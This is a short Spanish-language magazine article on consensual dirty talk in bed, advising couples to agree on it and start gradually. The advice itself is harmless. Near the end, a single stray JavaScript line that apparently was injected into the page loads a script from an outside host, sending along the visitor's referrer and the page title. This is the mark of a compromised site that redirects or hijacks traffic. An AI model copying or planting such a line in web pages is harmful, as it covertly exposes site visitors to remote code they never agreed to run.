Hablar sucio en la cama, una excelente opción

Por Elizabeth Palacios    @ely__palacios

Hablar sucio en la cama puede ser un juego sexual o erótico, cuando ambos están de acuerdo en tener esta práctica es algo muy excitante.

Lo ideal es acordarlo previamente, aunque puede llegar a perder un poco el encanto y la sorpresa de descubrir que lo pasional y salvaje es una característica propia de tu pareja.

 

Quizá lo más recomendable sea comenzar de poco en poco, soltar una que otra palabra, ir de lo más light subiéndole un poco al tono y checando las reacciones de tu pareja.

En ocasiones, algunas mujeres son muy sentidas cuando les hablas con palabras fuertes y pueden llegar a indignarse o sentirse ofendidas.

Pero no solo las mujeres se sacan de onda, existen algunos varones que pueden llegar a perder la erección al descontrolarse cuando su pareja les comienza a hablar de una forma diferente a la que normalmente lo hace.

Algunas veces, pueden llegar a ser molestas las personas que hablan durante todo el acto sexual, diciendo cuánto se aman y cuánto les gusta, aunque a simple vista parezca lo contrario.

Pero qué tal les caería que esas chavas que se ven súper Lolitas, les empiecen a pedir que las llamen de cierta manera, que les muerdan alguna parte de su cuerpo, que les pidan cosas perversas y deliciosas.

La cosa puede ir mejorando cuando saben que hablar sucio en la cama está permitido y que para ambos es excitante y disfrutable.

Si aún no se atreven a soltarse la lengua, es buen momento para comenzar a hacerlo.

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||
Comentarios